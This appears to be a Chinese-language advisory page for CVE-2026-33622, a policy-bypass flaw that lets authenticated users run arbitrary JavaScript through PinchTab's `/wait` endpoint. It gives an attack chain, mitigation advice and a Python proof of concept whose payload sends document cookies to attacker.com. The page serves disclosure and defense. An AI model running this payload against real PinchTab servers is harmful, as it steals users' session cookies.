CVE-2026-33622 CVSS 8.8 高危

CVE-2026-33622 PinchTab 任意代码执行漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33622

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PinchTab

漏洞概述

PinchTab v0.8.3至v0.8.5版本存在安全策略绕过漏洞。尽管系统默认禁用了JavaScript评估功能，但攻击者利用认证API访问权限，可通过`POST /wait`接口传入恶意`fn`参数，绕过`security.allowEvaluate`安全检查，导致在浏览器上下文中执行任意JavaScript代码，造成严重安全风险。

技术细节

该漏洞源于PinchTab在`/wait`端点处理`fn`模式时的逻辑缺陷。虽然`/evaluate`端点正确实施了`security.allowEvaluate`保护机制，但在受影响版本中，`/wait`端点直接将用户提供的`fn`表达式嵌入可执行JavaScript并在浏览器中评估，未进行相同的安全策略检查。这属于安全策略绕过漏洞。攻击者需持有服务器令牌（已认证），但可利用此漏洞在操作员明确禁用代码评估的情况下，强制执行任意JS代码，彻底控制浏览器标签页上下文。

攻击链分析

STEP 1

信息收集

攻击者识别出目标运行的是PinchTab v0.8.3到v0.8.5版本。

STEP 2

获取认证

攻击者获取PinchTab服务器的API访问令牌（认证是利用的必要条件）。

STEP 3

构造载荷

攻击者构造一个包含恶意JavaScript代码的`fn`参数，并将其放入JSON请求体中。

STEP 4

发送请求

攻击者向`POST /wait`或`POST /tabs/{id}/wait`端点发送带有认证令牌的恶意请求。

STEP 5

执行代码

服务器绕过安全检查，将恶意代码嵌入浏览器上下文并执行，导致任意代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
url = "http://localhost:port/wait"

# Attacker's server token (Required for exploitation)
token = "YOUR_SERVER_TOKEN"

# Malicious JavaScript to execute
# This example sends the document cookies to an external server
malicious_js = "fetch('http://attacker.com/exfil?c=' + document.cookie)"

# Prepare the payload exploiting the 'fn' mode
payload = {
    "fn": malicious_js,
    "mode": "fn"
}

headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
}

# Send the malicious request
response = requests.post(url, json=payload, headers=headers)

print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

影响范围

PinchTab v0.8.3

PinchTab v0.8.4

PinchTab v0.8.5

防御指南

临时缓解措施

在官方补丁发布前，建议严格限制对PinchTab API的网络访问，确保服务器令牌安全，并密切监控日志中是否存在对`/wait`接口的异常调用模式。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表